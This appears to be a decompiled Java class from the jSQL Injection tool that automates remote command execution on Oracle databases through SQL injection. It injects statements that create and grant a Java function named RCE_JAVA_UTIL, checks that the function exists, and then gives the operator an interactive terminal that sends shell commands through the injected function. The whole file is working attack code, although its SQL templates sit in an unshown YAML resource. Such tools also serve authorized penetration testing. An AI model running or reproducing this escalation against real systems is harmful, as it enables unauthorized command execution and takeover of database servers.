/*
 * Decompiled with CFR 0.152.
 */
package com.jsql.model.accessible.engine;

import com.jsql.model.InjectionModel;
import com.jsql.model.accessible.ExploitMode;
import com.jsql.model.accessible.engine.oracle.ModelYamlOracle;
import com.jsql.model.exception.JSqlException;
import com.jsql.util.LogLevelUtil;
import com.jsql.view.subscriber.Seal;
import java.util.Arrays;
import java.util.UUID;
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;
import org.yaml.snakeyaml.Yaml;

public class ExploitOracle {
    private static final Logger LOGGER = LogManager.getRootLogger();
    private final InjectionModel injectionModel;
    private final ModelYamlOracle modelYaml;
    private static final String RCE_JAVA_UTIL_SRC = "RCE_JAVA_UTIL_SRC";
    private static final String RCE_JAVA_UTIL_FUNC = "RCE_JAVA_UTIL_FUNC";

    public ExploitOracle(InjectionModel injectionModel) {
        this.injectionModel = injectionModel;
        Yaml yaml = new Yaml();
        this.modelYaml = yaml.loadAs(injectionModel.getMediatorEngine().getOracle().instance().getModelYaml().getResource().getExploit(), ModelYamlOracle.class);
    }

    public void createRce(ExploitMode exploitMode) throws JSqlException {
        if (!Arrays.asList(ExploitMode.AUTO, ExploitMode.QUERY_BODY).contains((Object)exploitMode)) {
            LOGGER.log(LogLevelUtil.CONSOLE_INFORM, "Exploit method not implemented, using query body instead");
        }
        this.injectionModel.injectWithoutIndex(String.format(this.modelYaml.getUdf().getDropSource(), RCE_JAVA_UTIL_SRC), "body#drop-src");
        this.injectionModel.injectWithoutIndex(String.format(this.modelYaml.getUdf().getDropFunc(), RCE_JAVA_UTIL_FUNC), "body#drop-src");
        this.injectionModel.injectWithoutIndex(String.format(this.modelYaml.getUdf().getAddSource(), RCE_JAVA_UTIL_SRC, RCE_JAVA_UTIL_SRC), "body#add-src");
        this.injectionModel.injectWithoutIndex(String.format(this.modelYaml.getUdf().getAddFunc(), RCE_JAVA_UTIL_FUNC, RCE_JAVA_UTIL_SRC), "body#add-func");
        this.injectionModel.injectWithoutIndex(this.modelYaml.getUdf().getGrant(), "body#grant-exec");
        String nameDatabase = this.injectionModel.getResourceAccess().getResult(String.format(this.modelYaml.getUdf().getConfirm(), "%01%03%03%07", RCE_JAVA_UTIL_FUNC), "body#confirm");
        if (!nameDatabase.contains(RCE_JAVA_UTIL_FUNC)) {
            LOGGER.log(LogLevelUtil.CONSOLE_ERROR, "RCE failure: java function not found");
            return;
        }
        LOGGER.log(LogLevelUtil.CONSOLE_SUCCESS, "RCE successful: java function found");
        this.injectionModel.sendToViews(new Seal.AddTabExploitUdf((command, terminalID) -> this.injectionModel.getResourceAccess().getExploitOracle().runRceCmd((String)command, (UUID)terminalID)));
    }

    public void runRceCmd(String command, UUID uuidShell) {
        String result;
        try {
            result = this.injectionModel.getResourceAccess().getResult(String.format(this.modelYaml.getUdf().getRunCmd(), RCE_JAVA_UTIL_FUNC, command.replace(" ", "%20"), "%01%03%03%07"), "udf#run-cmd");
        }
        catch (JSqlException e) {
            result = String.format("Command failure: %s\nTry '%s 2>&1' to get a system error message.\n", e.getMessage(), command);
        }
        this.injectionModel.sendToViews(new Seal.GetTerminalResult(uuidShell, result));
    }
}

